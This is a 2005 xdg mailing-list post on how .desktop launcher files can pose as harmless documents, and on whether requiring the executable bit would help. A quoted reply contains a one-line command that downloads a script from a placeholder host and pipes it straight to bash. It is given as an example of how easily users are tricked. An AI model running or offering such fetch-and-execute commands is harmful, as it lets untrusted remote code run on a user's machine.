"Name" key value in desk. entry spec collides with file names, could misguide users?
Lars Hallberg
spam at micropp.se
Mon Mar 21 22:59:54 EET 2005
Mike Hearn wrote:
>>For normal people setting +x it's a _difficult_ task
>>
>>
>It is not, you just have to check the right boxes in the properties
>window. Anybody can learn that. I don't agree that this would have any
>benefit at all, not even psychological - fundamentally writing trojan
>horses is not difficult and if you can convince somebody to click on an
>icon you can convince them to copy/paste some meaningless command into
>the "Run" dialog like:
>
> wget http://foo.org/bar.sh -q -O /dev/stdout | bash -
>
>which achieves the same effect.
>
>
You miss the point her. The problem is that a .desktop file is an
executable that to the user can pose as inocent data with safe viewer.
Jpeg, pdf, mpeg or what ever. That are an evel(TM) feature. Requieing
the x bit vill blow ther cover in some cases.
But we *need* filebrowsers to give them up with other visual clue, for
other cases. A shared directory for a workgroup is another example. If
one user is compromized evil code can spread to other users (and
maschines) by posing ass legetim data in that derictory - The x bit will
not help in that case :-(
Code shuld *not* be able to pose as safe data and start when a user do
what he normaly do to start a safe viewer - not ever, ever!
/LaH
More information about the xdg
mailing list